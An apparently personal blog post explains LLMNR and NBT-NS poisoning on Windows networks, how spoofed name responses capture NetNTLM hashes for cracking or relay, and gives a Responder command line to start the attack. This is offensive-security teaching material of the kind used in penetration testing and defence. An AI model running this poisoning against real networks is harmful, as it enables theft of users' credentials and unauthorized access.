LLMNR/NBT-NS Poisoning

By Ismail on Aug 12, 2023
LLMNR/NBT-NS Poisoning

LLMNR/NBT-NS

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are components in Microsoft Windows systems that act as backup methods for host identification when traditional DNS resolution fails. In scenarios where DNS resolution is unsuccessful, the machine may resort to querying other machines on the local network to determine the correct host address.

LLMNR, which operates on port 5355 over UDP, is based on the DNS format and enables hosts on the same local network to resolve names for other hosts. It functions through multicast messages, allowing hosts to collectively perform name resolution tasks.

If LLMNR fails to provide the necessary resolution, the system may turn to NBT-NS. NBT-NS, utilizing port 137 over UDP, identifies systems on the local network by their NetBIOS names. It is an older protocol that predates DNS and is commonly used in Windows environments for local network communication and name resolution.

With network access, it’s possible to deceive systems within the broadcast domain by spoofing authoritative name resolution sources, such as hosts expected to be present in the network segment. By responding to LLMNR and NBT-NS traffic with falsified information, we can trick the requesting hosts into believing that our rogue system possesses the necessary details about the requested host’s location.

This poisoning technique aims to redirect communication to our system, allowing us to intercept authentication actions or retrieve the NetNTLM hash from the targeted host. The captured hash can then be subjected to offline brute force attacks in an attempt to uncover the plaintext password. Additionally, authentication requests can be relayed to gain access to other hosts or exploited against different protocols, such as LDAP, on the same host.

Tools

We can use the following tools to perform this attack

Responder For Linux

Inveigh For Windows

Using Responder

To initiate this attack using Responder, locate the Responder.conf file typically found in /usr/share/responder. Ensure that the SMB server is enabled, as it may not be activated by default.

Responder will output information on the screen and log it per host in the /usr/share/responder/logs directory. Hashes are saved in the format (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt. One hash is printed to the console and stored in its respective log file, unless verbose (-v) mode is enabled.

After configuring the settings, execute the command

sudo responder -I $Interface -v

This command will start the poisoning of traffic and display any captured hashes. We can also Run responder in Passive mode using -A flag but it will not posion the traffic.

Read my other blogs at this page.

Once Again, Feel Free to Contact Me :)
Linkedin icondiscord icon
Built with ♥